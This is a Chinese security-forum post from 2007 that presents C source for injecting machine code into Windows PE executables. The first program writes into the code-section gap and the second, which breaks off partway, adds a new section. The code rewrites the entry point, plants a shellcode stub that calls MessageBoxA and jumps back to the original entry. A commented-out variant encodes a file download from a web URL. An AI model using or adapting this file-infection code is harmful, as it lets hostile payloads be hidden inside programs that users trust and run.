楼主 发表于 2007-10-31 18:47  只看该作者

[原创]俩种方式实现注入机器码

文章作者:小浩
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

PE插缝:
Code Language : C
  1. //by 小浩 Q82602935
  2. #include \"stdafx.h\"
  3. #include <io.h>
  4. #include <sys\stat.h>
  5. #include <fcntl.h>
  6. #include <stdio.h>
  7.  
  8.  
  9.  
  10. typedef struct tagPeInfo
  11. {
  12.     DWORD dwPeNewEntryAddress;
  13.     DWORD dwPeOldEntryAddress;
  14.     DWORD dwPePhysicalSize;
  15.     DWORD dwPePhysicalAddress;
  16.     DWORD dwPeVirtualSize;
  17.     DWORD dwPeAddress;
  18.     DWORD dwPegapsize;
  19.     DWORD dwPeCodeoffset;
  20.     DWORD dwPeEntryoffset;
  21. }PeInfo,*PPeInfo;
  22.  
  23.  
  24. typedef struct PE_HEADER_MAP
  25. {
  26.     DWORD Signature;
  27.     IMAGE_FILE_HEADER _head;
  28.     IMAGE_OPTIONAL_HEADER opt_head;
  29.     IMAGE_SECTION_HEADER section_header[6];
  30. }peHeader;
  31.  
  32.  
  33.  
  34. /*unsigned char szHexCode[] = {0x6A ,0x40 ,0xE8 ,0x15 ,0x00 ,0x00 ,0x00 ,0xCE ,0xDE ,0xCC,
  35. 0xF5 ,0xBC ,0xFE ,0xCE ,0xAA ,0xC4 ,0xE3 ,0xA3 ,0xAC ,0xBB,
  36. 0xB6 ,0xD3 ,0xAD ,0xC4 ,0xFA ,0xA3 ,0xA1 ,0x00 ,0xE8 ,0x06 ,
  37. 0x00 ,0x00 ,0x00 ,0x68 ,0x65 ,0x6C ,0x6C ,0x6F ,0x00 ,0x6A ,
  38. 0x00 ,0xB8 ,0x8A ,0x05 ,0xD5 ,0x77 ,0xFF ,0xD0 ,0xe9 ,0x00 ,
  39.                                  0x00 ,0x00 ,0x00 };
  40. */
  41. unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
  42. 0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
  43. 0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
  44.  
  45. /*
  46. /*unsigned char szHexCode[]={
  47. 0x8B,0xF4,0x68,0x30,0xF0,0x41,0x00,0xFF,0x15,0x3C,
  48. 0x41,0x42,0x00,0x3B,0xF4,0xE8,0xA4,0x00,0x00,0x00,
  49. 0x89,0x45,0xFC,0x8B,0xF4,0x68,0x1C,0xF0,0x41,0x00,
  50. 0x8B,0x45,0xFC,0x50,0xFF,0x15,0x38,0x41,0x42,0x00,
  51. 0x3B,0xF4,0xE8,0x89,0x00,0x00,0x00,0x89,0x45,0xF8,
  52. 0x6A,0x00,0x6A,0x00,0xE8,0x07,0x00,0x00,0x00,0x63,
  53. 0x3A,0x5C,0x31,0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,
  54. 0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,
  55. 0x77,0x2E,0x62,0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,
  56. 0x6D,0x2F,0x69,0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,
  57. 0x2E,0x67,0x69,0x66,0x00,0x6A,0x00,0xF8,0xFF,0xD0,
  58. 0xe9,0x00,0x00,0x00,0x00};
  59. */
  60.  
  61.  
  62. int GetPeInfo(void *vBasepointer,PPeInfo Peinfo)
  63. {
  64.   IMAGE_DOS_HEADER *iDosHeader=(IMAGE_DOS_HEADER*)vBasepointer;
  65.   if(iDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
  66.   {
  67.       MessageBox(NULL,\"Unknown type of file\",\"Unknown type of file\",NULL);
  68.      return 0;
  69.  }
  70.  
  71.  peHeader *pEheader=(peHeader*)((char*)iDosHeader+iDosHeader->e_lfanew);
  72.  if(pEheader->Signature!=IMAGE_NT_SIGNATURE)
  73.  {
  74.      MessageBox(NULL,\"Unknown type of file\",\"Unknown type of file\",NULL);
  75.      return 0;
  76.  }
  77.  
  78.  char *szRet=strstr((const char*)pEheader->section_header[0].Name,\".text\");
  79.  if(!szRet)
  80.  {
  81.      MessageBox(NULL,\"Unknown type of file\",\"Unknown type of file\",NULL);
  82.      return 0;
  83.  }
  84.  
  85.  Peinfo->dwPeAddress=iDosHeader->e_lfanew;
  86.  
  87.  Peinfo->dwPeVirtualSize=pEheader->section_header[0].Misc.VirtualSize;  //真实长度
  88.  
  89.  Peinfo->dwPePhysicalAddress=pEheader->section_header[0].PointerToRawData;  //物理偏移
  90.  
  91.  Peinfo->dwPePhysicalSize=pEheader->section_header[0].SizeOfRawData;   //物理长度
  92.  
  93.  Peinfo->dwPegapsize=Peinfo->dwPePhysicalSize
  94.      -Peinfo->dwPeVirtualSize;            //缝隙大小
  95.  
  96.  Peinfo->dwPeCodeoffset=pEheader->opt_head.BaseOfCode
  97.      -Peinfo->dwPePhysicalAddress;               //加载到内存中的代码段与文件中的代码段的差
  98.  
  99.  Peinfo->dwPeEntryoffset=pEheader->section_header[0].PointerToRawData
  100.      +pEheader->section_header[0].Misc.VirtualSize;  //代码写入的物理偏移
  101.  
  102.  DWORD dwMods=Peinfo->dwPeEntryoffset%16;
  103.  if(dwMods!=0)
  104.  {
  105.      Peinfo->dwPeEntryoffset+=(16-dwMods);
  106.  }
  107.  
  108.  Peinfo->dwPeOldEntryAddress=pEheader->opt_head.AddressOfEntryPoint; //OEP
  109.  Peinfo->dwPeNewEntryAddress=Peinfo->dwPeEntryoffset+Peinfo->dwPeCodeoffset; //程序新入口地址
  110.  return 1;
  111. }
  112.  
  113. CString StrOfDWord(DWORD dwAddress)
  114. {
  115.    unsigned char waddress[4]={0};
  116.    
  117.    waddress[3]=(char)(dwAddress>>24)&0xFF;
  118.    waddress[2]=(char)(dwAddress>>16)&0xFF;
  119.    waddress[1]=(char)(dwAddress>>8 )&0xFF;
  120.    waddress[0]=(char)(dwAddress  )&0xFF;
  121.    
  122.    return waddress;
  123. }
  124.  
  125. int WriteCodeTofile(char szFilePath[],PPeInfo Peinfo)
  126. {
  127.  
  128.  int nTolen=sizeof(szHexCode);
  129.  
  130.  
  131.  DWORD dwRet;
  132.  int nRet=_open(szFilePath,_O_RDWR | _O_CREAT | _O_BINARY,_S_IREAD | _S_IWRITE);
  133.  if(!nRet)
  134.  {
  135.    MessageBox(NULL,\"_open Error!\",\"_open Error!\",NULL);
  136.    return 0;
  137.  }
  138.  
  139.  dwRet=_lseek(nRet,(long)Peinfo->dwPeAddress+40,SEEK_SET);
  140.  if(dwRet==-1)
  141.  {
  142.    MessageBox(NULL,\"_lseek Error!\",\"_lseek Error!\",NULL);
  143.    return 0;
  144.  }
  145.  
  146.      char szWaddress[4]={0};
  147.  memcpy(szWaddress,StrOfDWord(Peinfo->dwPeNewEntryAddress),4);
  148.  
  149.    dwRet=_write(nRet,szWaddress,4);
  150.      if(dwRet==-1)
  151.  {
  152.        MessageBox(NULL,\"_write Error!\",\"_write Error!\",NULL);
  153.        return 0;
  154.  }
  155.  
  156. /*    CString szMsgA;
  157.    DWORD dwMessageBoxAadaddress;
  158.      HINSTANCE gLibMsg=LoadLibrary(\"user32.dll\");
  159.    dwMessageBoxAadaddress=(DWORD)GetProcAddress(gLibMsg,\"MessageBoxA\");
  160.      szMsgA=StrOfDWord(dwMessageBoxAadaddress);
  161. */
  162.    CString szOepA;
  163.    DWORD dwAddress;
  164.    dwAddress = 0-(Peinfo->dwPeNewEntryAddress
  165.        -Peinfo->dwPeOldEntryAddress+nTolen);
  166.    szOepA=StrOfDWord(dwAddress);
  167.  
  168.    for(int i=0;i<4;i++)
  169.    {
  170.        szHexCode[32+i]=szOepA.GetAt(i);
  171.    }
  172.  
  173.    dwRet=_lseek(nRet,(long)Peinfo->dwPeEntryoffset,SEEK_SET);
  174.    if(dwRet==-1)
  175.    {
  176.        MessageBox(NULL,\"_lseek Error!\",\"_lseek Error!\",NULL);
  177.        return 0;
  178.    }
  179.  
  180.    dwRet=_write(nRet,szHexCode,nTolen);
  181.      if(dwRet==-1)
  182.  {
  183.        MessageBox(NULL,\"_write Error!\",\"_write Error!\",NULL);
  184.        return 0;
  185.  }
  186.  
  187.    _close(nRet);
  188.    return 1;
  189. }
  190.  
  191.  
  192. int InjectCodeToFile(char szFilePath[])
  193. {
  194.  HANDLE hFile=CreateFile(szFilePath,GENERIC_READ|GENERIC_WRITE,
  195.      FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,0);
  196.  if(hFile==INVALID_HANDLE_VALUE)
  197.  {
  198.      MessageBox(NULL,\"CreateFile Error!\",\"CreateFile Error!\",NULL);
  199.      return 0;
  200.  }
  201.  
  202.  HANDLE hMapping=CreateFileMapping(hFile,0,PAGE_READONLY | SEC_COMMIT,0,0,0);
  203.  if(!hMapping)
  204.  {
  205.      MessageBox(NULL,\"CreateFileMapping Error!\",\"CreateFileMapping Error!\",NULL);
  206.      return 0;
  207.  }
  208.  
  209.  void *vBasepointer=MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0);
  210.  if(!vBasepointer)
  211.  {
  212.      MessageBox(NULL,\"MapViewOfFile Error!\",\"MapViewOfFile Error!\",NULL);
  213.      return 0;
  214.  }
  215.  
  216.  CloseHandle(hFile);
  217.  CloseHandle(hMapping);
  218.  
  219.  PeInfo pEinfo;
  220.  int nRet=GetPeInfo(vBasepointer,&pEinfo);
  221.  if(!nRet)
  222.  return 0;
  223.  UnmapViewOfFile(vBasepointer);
  224.  
  225.  if(pEinfo.dwPegapsize<sizeof(szHexCode))
  226.  {
  227.      MessageBox(NULL,\"No room to write the data!\",\"No room to write the data!\",NULL);
  228.      return 0;
  229.  }
  230.  
  231.  WriteCodeTofile(szFilePath,&pEinfo);
  232.  
  233.  return 1;
  234. }
  235.  
  236.  
  237.  
  238. void main()
  239. {
  240.    char szFilePath[MAX_PATH];
  241.    printf(\"Please Input File Path:\");
  242.    scanf(\"%s\",&szFilePath);
  243.  
  244.    char szFileBak[MAX_PATH];
  245.    lstrcpy(szFileBak,szFilePath);
  246.  lstrcat(szFileBak,\".bak\");
  247.    CopyFile(szFilePath,szFileBak,FALSE);
  248.  
  249.  
  250.  
  251.    InjectCodeToFile(szFilePath);
  252. }
  253. [/code]
  254.  
  255.  
  256. PE添节:
  257. [code]
  258. //转载请注明 By 小浩 QQ:82602935
  259. #include <afx.h>
  260. #include <stdio.h>
  261. #include <assert.h>
  262.  
  263.  
  264. unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
  265. 0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
  266.  0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
  267.  
  268.  
  269. CString StrOfDWord(DWORD dwAddress)
  270. {
  271.    unsigned char waddress[4]={0};
  272.    
  273.    waddress[3]=(char)(dwAddress>>24)&0xFF;
  274.    waddress[2]=(char)(dwAddress>>16)&0xFF;
  275.    waddress[1]=(char)(dwAddress>>8 )&0xFF;
  276.    waddress[0]=(char)(dwAddress  )&0xFF;
  277.    
  278.    return waddress;
  279. }
  280.  
  281.  
  282. int Align(int size, int ALIGN_BASE)
  283. {
  284.    int ret;
  285.    int result;
  286.    
  287.    assert( 0 != ALIGN_BASE );
  288.    
  289.    result = size % ALIGN_BASE;
  290.    if (0 != result)    
  291.    {
  292.        ret = ((size / ALIGN_BASE) + 1) * ALIGN_BASE;
  293.    }
  294.    else
  295.    {
  296.        ret = size;
  297.    }
  298.    
  299.    return ret;
  300. }
  301.  
  302. void main()
  303. {
  304.    char szFilePath[MAX_PATH]={0};
  305.    printf(\"Please Input FilePath:\");
  306.    scanf(\"%s\",&szFilePath);
  307.    
  308.    char szFilaBak[MAX_PATH]={0};
  309.    lstrcpy(szFilaBak,szFilePath);
  310.    lstrcat(szFilaBak,\".bak\");
  311.  int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
  312.  if(!nRet)
  313.    {
  314.        printf(\"CopyFile Error!\r\n\");
  315.        return;
  316.    }
  317.  
  318.    FILE *pFile;
  319.    pFile=fopen(szFilePath,\"rb+\");
  320.    if(pFile==NULL)
  321.    {
  322.        printf(\"fopen Error!\r\n\");
  323.        return;
  324.    }
  325.    fseek(pFile,0,SEEK_SET);
  326.  
  327.  IMAGE_DOS_HEADER iMageDosHeader;
  328.    fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
  329.  if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
  330.    {
  331.        printf(\"Unknown type of file!\r\n\");
  332.        return;
  333.    }
  334.    fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
  335.  
  336.    IMAGE_NT_HEADERS iMageNtHeaders;
  337.    fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
  338.    if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
  339.    {
  340.        printf(\"Unknown type of file!\r\n\");
  341.        return;
  342.    }
  343.  
  344.    int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
  345.  printf(\"%d Segment\r\n\",nNumOfSections);
  346.  
  347.    int nFileAlignMent,nSectionAlignMent;
  348.    nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
  349.    nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
  350.  printf(\"File Align Ment:%x\r\n\",nFileAlignMent);
  351.  printf(\"Section Align Ment:%x\r\n\",nSectionAlignMent);
  352.  
  353.    DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
  354.  printf(\"File OEP:%08x\r\n\",dwOldOEP);
  355.